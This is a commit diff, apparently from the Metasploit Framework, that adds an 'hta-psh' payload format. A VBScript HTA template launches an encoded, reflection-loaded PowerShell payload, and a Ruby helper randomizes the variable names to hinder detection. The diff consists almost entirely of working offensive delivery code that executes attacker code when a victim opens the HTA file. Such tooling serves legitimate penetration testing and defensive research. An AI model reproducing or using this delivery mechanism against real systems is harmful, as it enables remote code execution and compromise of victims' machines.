Land rapid7#5212, HTA Powershell template

Author: wchen-r7

data/templates/scripts/to_powershell.hta.template

@@ -0,0 +1,7 @@
+<script language="VBScript">
+  Set %{var_shell} = CreateObject("Wscript.Shell") 
+  Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
+  If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
+    %{var_shell}.Run "%{powershell}"
+  End If
+</script>

lib/msf/util/exe.rb

@@ -1117,6 +1117,29 @@ def self.to_powershell_command(framework, arch, code)
                     method: 'reflection')
   end
 
+  def self.to_powershell_hta(framework, arch, code)
+    template_path = File.join(Msf::Config.data_directory,
+                              "templates",
+                              "scripts")
+
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    remove_comspec: true,
+                    method: 'reflection')
+
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_shell)
+    rig.init_var(:var_fso)
+
+    hash_sub = rig.to_h
+    hash_sub[:powershell] = powershell
+
+    read_replace_script_template("to_powershell.hta.template", hash_sub)
+  end
+
   def self.to_win32pe_vbs(framework, code, opts = {})
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
@@ -1928,6 +1951,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
       Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
     when 'psh-cmd'
       Msf::Util::EXE.to_powershell_command(framework, arch, code)
+    when 'hta-psh'
+      Msf::Util::EXE.to_powershell_hta(framework, arch, code)
     end
   end
 
@@ -1943,6 +1968,7 @@ def self.to_executable_fmt_formats
       "exe-only",
       "exe-service",
       "exe-small",
+      "hta-psh",
       "loop-vbs",
       "macho",
       "msi",